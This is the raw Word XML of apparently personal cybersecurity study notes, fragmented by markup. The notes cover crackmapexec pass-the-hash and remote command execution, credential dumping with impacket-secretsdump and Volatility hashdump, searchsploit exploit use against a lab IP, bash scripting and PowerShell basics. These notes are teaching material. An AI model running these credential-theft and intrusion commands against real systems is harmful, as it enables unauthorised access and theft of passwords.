      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellEnd"/>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give us the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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roofErr w:type="spellEnd"/>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of users and passwords</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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10.10 -u administrator -H ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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aasa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--shares – will use the has</w:t>
      </w:r>
      <w:r w:rsidR="000120D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password for get data on share directories</w:t>
      </w:r>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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10.10 -u administrator -p 123456 -x ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D08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malware’ – create directory called “malware”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B1E0D" w14:textId="63CF967F" w:rsidR="00726FC1" w:rsidRDefault="00726FC1" w:rsidP="003C197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 – flag for pass the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instead of password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-x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mkdir</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malware’ – run command on the remote machine, in this example to create directory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C1974" w:rsidRP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3C1974" w:rsidRP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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C1974" w:rsidRP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for extracting local account details from the SAM database on individual computers</w:t>
      </w:r>
      <w:r w:rsidR="008110C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C1974" w:rsidRP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3C1974" w:rsidRP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ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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1974" w:rsidRPr="003C19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for extracting domain credentials from Active Directory domain controllers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--shares – extract info on share directories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--groups – get data on the groups and the amount of users every group has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--groups startup – choose specific group, then we will get more data on the startup group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80AAFCD" w14:textId="30ECCA5A" w:rsidR="00360534" w:rsidRDefault="00297646" w:rsidP="009C77E4">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Impacket-secretsdump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SAM.hive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secuirty</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SECURITY.hive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SYSTEM.hive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local – t</w:t>
      </w:r>
      <w:r w:rsidRPr="002976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command extracts hashed passwords and  other sensitive security information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r w:rsidRPr="002976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uses the SYSTEM hive to decrypt the hashes found in the SAM hive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r w:rsidRPr="002976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can also extract and decrypt LSA Secrets if they are accessible within the SECURITY hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B685FBE" w14:textId="050487CB" w:rsidR="00F833E7" w:rsidRDefault="00F833E7"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searchsploit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vsftpd</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all the exist exploits of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vsftpd</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 in the DB exploit</w:t>
      </w:r>
      <w:r w:rsidR="00093FD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093FD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searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00093FD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 17491 – download the exploit file 17491 to our machine.</w:t>
      </w:r>
      <w:r w:rsidR="001418A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python 4957.py 10.10.10.10 – use the exploit 4957.py in the target 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBBF25" w14:textId="77777777" w:rsidR="00697594" w:rsidRDefault="00697594" w:rsidP="0034059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AB629" w14:textId="6EEB9082" w:rsidR="00601862" w:rsidRPr="000C387E" w:rsidRDefault="00601862" w:rsidP="00601862">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Volatality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 in windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76388DC3" w14:textId="224F99B6" w:rsidR="00601862" w:rsidRPr="00A80D19" w:rsidRDefault="00601862" w:rsidP="00EA6EB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Volatality</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this tool can be used in windows and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difference is vol.exe or ./vol</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we used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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volatality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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2.5 and 3</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Vol.exe -f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memdump.mem</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imageinfo</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OS (found in profile), we have to get that for the next commands.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vol.exe -f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memdump.mem</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profile=winxpsp2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pstree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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processes in </w:t>
      </w:r>
      <w:r w:rsidR="00933DDE" w:rsidRP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hierarchy</w:t>
      </w:r>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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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pslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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procceses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00933DD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C50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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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mftparser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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shows all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C50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mft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C50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w:t>
      </w:r>
      <w:r w:rsidR="003E0F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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E0F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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E0F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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E0F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printkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E0F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 “SAM\Domains\Account\Users\Names” – output all the users</w:t>
      </w:r>
      <w:r w:rsidR="003E0F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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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connscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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shows all the connection that’s has been on the computer</w:t>
      </w:r>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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--profile=winxpsps2 connections – shows all the connections that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A257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active when the memory has been take</w:t>
      </w:r>
      <w:r w:rsidR="003907B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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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dlllist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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788 – shows the path of the process</w:t>
      </w:r>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./vol -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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memdump.mem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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--profile=winxpsps2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B7689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hivelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005017A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 a list of all the registries</w:t>
      </w:r>
      <w:r w:rsidR="008D2D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./vol -f dump2.mem –profile=vistasp1x86 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D2D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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D2D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 the hashes of the users.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volatality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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lil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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difference syntax</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./vol.py -f m4.vmem windows.info – output profile, as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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imageinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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vol 2.5</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./vol.py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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windows.pslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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processes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./vol.py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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windows.netscan.NetScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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shows connections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./vol.py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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windows.envas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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computer name</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./vol.py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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windows.filescan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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a lot of paths of files, and its offsets</w:t>
      </w:r>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./vol.py -f m4.vmem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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windows.dumpfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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virtaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009826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0x808 – extract a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D12BE" w14:textId="77777777" w:rsidR="00A80D19" w:rsidRPr="00933DDE" w:rsidRDefault="00A80D19"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6CFD8D" w14:textId="77777777" w:rsidR="0094127D" w:rsidRDefault="0094127D"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FBA3C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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8907D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00C3085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E31F6A" w14:textId="41A9147F" w:rsidR="0094127D" w:rsidRPr="000C387E" w:rsidRDefault="0094127D" w:rsidP="0094127D">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Geany</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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19709963" w14:textId="588FFB65" w:rsidR="00670C38" w:rsidRPr="00670C38" w:rsidRDefault="00670C38" w:rsidP="00670C3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#!/bin/bash – the first line in bash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scipt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called shebang</w:t>
      </w:r>
      <w:r w:rsidR="00586B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chmod +x file.sh – for we could run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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./file.sh – run the script</w:t>
      </w:r>
      <w:r w:rsidR="000D38A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bash file.sh – run the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468EBFB" w14:textId="7FD96049" w:rsidR="0052648E" w:rsidRDefault="00670C38"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“enter a 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read answer</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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input </w:t>
      </w:r>
      <w:r w:rsidR="003C2A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read -p “enter a name: ” name – shortcut of echo and read in the same line</w:t>
      </w:r>
      <w:r w:rsidR="001A6FC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read -s answer – get input without seeing on the screen</w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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echo -e “1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D87A1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Asdasd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D87A1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\n2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D87A1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asdawd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D87A1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for using special characters as \n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echo “hello $answer” – using the variable, pay attention, </w:t>
      </w:r>
      <w:r w:rsidR="00D87A1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  ‘</w:t>
      </w:r>
      <w:r w:rsidR="006208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6208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006208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 erel.txt | awk ‘{print $NF}’) – insert a value to variable</w:t>
      </w:r>
      <w:r w:rsidR="001D0E2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space is must not</w:t>
      </w:r>
      <w:r w:rsidR="00B953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location = $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B953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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B953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accumulate the current path</w:t>
      </w:r>
      <w:r w:rsidR="00F344A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$number = $((number + count)) – syntax of sum of 2 numbers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA59AB" w14:textId="7EC0E767" w:rsidR="0052648E" w:rsidRDefault="0052648E" w:rsidP="00E3309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WHOIS()</w:t>
      </w:r>
      <w:r w:rsidR="00E3309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echo ”hello”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4B238" w14:textId="43B0D5EF" w:rsidR="0052648E" w:rsidRDefault="0052648E"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WHOIS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the syntax for function, you have to remember to call the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0EEEE" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="0052648E" w:rsidP="00CF33F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“$answer” == “y”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echo “ok, bye”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else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echo “wrong input”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syntax of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have to put fi in the end, you have to write then line after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you can compare strings in ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6A5B3" w14:textId="77777777" w:rsidR="00EE1783" w:rsidRDefault="00CF33F1" w:rsidP="00EE178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“$name” == “” ] – check if the variable is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED1DEF" w14:textId="052D92E6" w:rsidR="00CC2CFA" w:rsidRDefault="00CC2CFA" w:rsidP="00CC2C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2CF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grep -q '[^[:space:]]' "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2CF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first_location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2CF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if the file contains anything then space (to check if the file is empty of content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C7BA7" w14:textId="4572672E" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00CC2C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-d “/home/kali/results” ] – check if the directory exist then, else …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248537FE" w14:textId="32F5853E" w:rsidR="00233685" w:rsidRDefault="00233685" w:rsidP="00987E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-f “$path” ] – get as input file path and check if exist then, else…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D05EA7" w14:textId="77777777" w:rsidR="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E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0E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"$country" != "IL" ] &amp;&amp; [ "$country" != ""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the country is not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israel</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use &amp;&amp; for two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statemnets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="534DA8BF" w14:textId="51F90EDA" w:rsidR="0052648E" w:rsidRDefault="00987E1B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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check_if_anonymous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987E1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-eq 0 ]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syntax to compare to number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303805E4" w14:textId="206C67F2" w:rsidR="0017417B" w:rsidRPr="00987E1B" w:rsidRDefault="0017417B" w:rsidP="0017417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417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 "${var,,}" == "yes"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var variable converted to low characters before comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B387" w14:textId="4219EE05" w:rsidR="00930780" w:rsidRDefault="00930780"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whois</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using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whois</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tool to search about this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geoiplookup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using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geoiplookup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tool to search about this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p>
    <w:p w14:paraId="75D4AB7F" w14:textId="7D9AB174" w:rsidR="00892789" w:rsidRDefault="00892789"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figlet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 project” – basic animation for beauty headline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="3CB1646B" w:rsidR="00FD41BF" w:rsidRDefault="00FD41BF" w:rsidP="0052648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sleep 2 – wait 2 seconds before continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34173CD5" w14:textId="2C0F6ECC" w:rsidR="00EB2E07" w:rsidRDefault="00EB2E07"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$number in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2)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echo “wrong input”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esac</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syntax of case, the $number is a number to insert one of the cases, *) is for every number that not one of the numbers like 1 or 2 in this case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dunction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esac</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enclose the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5DED2" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5"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FE4022" w14:textId="77777777" w:rsidR="004456B5" w:rsidRDefault="004456B5"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6797C7" w14:textId="1DB60CB9" w:rsidR="004456B5" w:rsidRDefault="00D15AE0"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5AE0">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C12DCC3" wp14:editId="5DB8EE59">
            <wp:extent cx="5274310" cy="1688465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="71498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88331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1688465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002D35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syntax for using array, and installing packages, -s for check if the package exist,</w:t>
      </w:r>
      <w:r w:rsidR="002D35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if not, it install the package and sign -y automatically for the question if to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D578C8" w14:textId="46065015" w:rsidR="00233685" w:rsidRDefault="00233685"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Y=0 – define a numerical variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806268D" w14:textId="006476DC" w:rsidR="00CC796D" w:rsidRDefault="00CC796D"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&gt;/dev/null 2&gt;&amp;1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delete all the output from the command, pay attention it will work only if you will put it in the right places, in the end of command before grep and more commands.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2&gt;/dev/null – will not print error, could use to hide logo tools (as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volatality</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E8F7EC" w14:textId="2B0DECA8" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1"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Filename=$(</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basename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“$path”) – get full path and extract the name of the file inside the variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED5B59" w14:textId="638BC069" w:rsidR="00730659" w:rsidRDefault="00D924ED"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extension="${filename##*.}"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306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 the name of file and extract the name of the extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E857" w14:textId="0A84234C" w:rsidR="00730659" w:rsidRDefault="00730659"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asd.txt – creates an empty file and override if already exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7B6F58" w14:textId="48F9C586" w:rsidR="00596447" w:rsidRDefault="00596447"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964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start_seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005964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-d "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005964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start_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005964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current time in epoch time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AED10" w14:textId="77777777" w:rsidR="00CE3331" w:rsidRDefault="00CE3331"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638434" w14:textId="3C9C22D5" w:rsidR="00D8498F" w:rsidRDefault="00CE3331" w:rsidP="00CE3331">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts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331">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00D8498F" w:rsidRPr="00D8498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>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CF1200B" wp14:editId="0F7A2B22">
            <wp:extent cx="6237515" cy="1607066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1439834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34320" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6268583" cy="1615071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABC8FD" w14:textId="7555F486" w:rsidR="00CE3331" w:rsidRDefault="00CE3331" w:rsidP="00CE33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the syntax of the for loop is to take info on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using tools like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masscan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using &amp; in the end of the loop, it is does the scanning on all the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list simultaneously and save time, by wait command, it wait for the process to end before continue to the next command s in the automation, by timeout 30 , it limit the scan for 30 seconds, by using ${ip}_nmap.txt it know to refer to the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 and not search for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ip_nmap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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4166AC3A" w14:textId="77777777" w:rsidR="00CF33F1" w:rsidRDefault="00CF33F1"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E17206" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8"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A45D5F" w14:textId="77777777" w:rsidR="005578F8" w:rsidRDefault="005578F8" w:rsidP="00CC796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97EF9C" w14:textId="77777777" w:rsidR="00F36876" w:rsidRDefault="00F36876"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EA233"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7EB742"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48E241"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AF076E"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384428"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ABA7A"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9EB7E9"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B57E7B"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65864C"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5D28F8"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BB0E06"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357C26"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45B233"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BA9C7D"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66DCC"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D69607" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="004456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4B8F07" w14:textId="7322EB1A" w:rsidR="00F36876" w:rsidRPr="000C387E" w:rsidRDefault="00F36876" w:rsidP="00F36876">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Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66CB5D" w14:textId="6AE5C162" w:rsidR="002F60DB" w:rsidRDefault="00F613E9" w:rsidP="00FF6A8D">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hostname - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F613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returns the network name of the current computer</w:t>
      </w:r>
      <w:r w:rsidR="00475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75987" w:rsidRP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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00475987" w:rsidRP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GridView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00475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underrated command for open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00475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ouput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00475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comfortable GUI and use text manipulation, recommended when need to deal with the same output for a while</w:t>
      </w:r>
      <w:r w:rsidR="006A79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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A79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ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A79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all the items (files and directories) in my current location</w:t>
      </w:r>
      <w:r w:rsidR="00C95C6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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C95C6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ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95C6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measure – counts the items (similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C95C6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wc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95C6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w:t>
      </w:r>
      <w:r w:rsidR="00FF6A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Get-Location – show my current location (similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF6A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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF6A8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77A37" w:rsidRP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r w:rsidR="00B77A37" w:rsidRP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FileHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B77A37" w:rsidRP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77A37" w:rsidRP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node_repl_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B77A37" w:rsidRP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md5</w:t>
      </w:r>
      <w:r w:rsidR="00B77A3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md5 hash of a file</w:t>
      </w:r>
      <w:r w:rsidR="0069795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Get-Command -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0069795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commandtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069795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cmdlet – show all the cmdlet commands</w:t>
      </w:r>
      <w:r w:rsidR="005578F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Get-Command -name “*invoke*” – find all the commands that contains the string “invoke”</w:t>
      </w:r>
      <w:r w:rsidR="004E72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Get-Help Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E72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Webrequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E72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-examples – will show examples of use this command</w:t>
      </w:r>
      <w:r w:rsidR="002F60D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Get-Alias cd – show the parallel command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F60D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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A0F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Get-Content auth.log – get the content of the file (similar to cat)</w:t>
      </w:r>
      <w:r w:rsidR="00024C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Get-Content auth.log | Select-Object -Index 994 – get line 995 from the file (count from 0)</w:t>
      </w:r>
      <w:r w:rsidR="00C874E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Get-Date – get the current date</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C5241" w:rsidRP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r w:rsidR="001C5241" w:rsidRP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NetTCPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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data on</w:t>
      </w:r>
      <w:r w:rsidR="00EE29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TCP</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ports </w:t>
      </w:r>
      <w:r w:rsidR="00EE29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1C524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machine</w:t>
      </w:r>
      <w:r w:rsidR="00EF3D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F3DD2" w:rsidRPr="00EF3D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r w:rsidR="00EF3DD2" w:rsidRPr="00EF3D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NetUDPEndpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF3DD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data on UDP ports (it is not called connections cause in UDP there is not 3-way handshake, meaning there is not process of connection)</w:t>
      </w:r>
      <w:r w:rsidR="00220C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20C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97BF5" w:rsidRP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r w:rsidR="00B97BF5" w:rsidRP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ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97BF5" w:rsidRP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-Recurse | Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97BF5" w:rsidRP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FileHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97BF5" w:rsidRP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MD5 | Out-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97BF5" w:rsidRP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GridView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97B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all the files recursively (also those inside the directories) from you location, find their md5 hash and open GUI to see the output, and filter the output in more comfortable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3D4EC" w14:textId="0420F86A" w:rsidR="002C5B72" w:rsidRDefault="002C5B72" w:rsidP="00F613E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B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r w:rsidRPr="002C5B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ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5B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 Sort-Object Length -Descending | Select-Object -First 1</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 only the file in my current location then sort them by length in descending order, and output the first</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-File – show only files</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-Directory – show only directories</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-Recurse – search recursively (inside directories)</w:t>
      </w:r>
      <w:r w:rsidR="00A47F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-Name – search by name</w:t>
      </w:r>
      <w:r w:rsidR="008E75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Sort-Object length -Descending – sort all the objects by length in Descending order</w:t>
      </w:r>
      <w:r w:rsidR="008E75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Select-Object -First 1 – output only the first one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F828776" w14:textId="5E9FF2B4" w:rsidR="008E6B86" w:rsidRDefault="007B0372"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03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r w:rsidRPr="007B03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ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B03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-Recurse -File -Filter "auth.log" | Select-Object Mode, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B03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LastWriteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B03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Length, Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B03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FullName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recursively the auth.log file and show only info on it as </w:t>
      </w:r>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and more</w:t>
      </w:r>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-Filter – search for the name of the file</w:t>
      </w:r>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Fullname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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full path for the file</w:t>
      </w:r>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LastWriteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B1107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last time the file was changed</w:t>
      </w:r>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Length – the size of the file </w:t>
      </w:r>
      <w:r w:rsidR="00BD43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000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Get-Process – show all the processes and show stats</w:t>
      </w:r>
      <w:r w:rsid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775E5" w:rsidRP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Get-Process | sort -Property </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009775E5" w:rsidRP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proofErr w:type="spellEnd"/>
      <w:r w:rsid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sort all the processes by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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proofErr w:type="spellEnd"/>
      <w:r w:rsid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w:t>
      </w:r>
      <w:r w:rsidR="00AC4B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C4B75" w:rsidRPr="009775E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 -Property</w:t>
      </w:r>
      <w:r w:rsidR="00AC4B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C4B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proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC4B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sort by column </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC4B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proofErr w:type="spellEnd"/>
    </w:p>
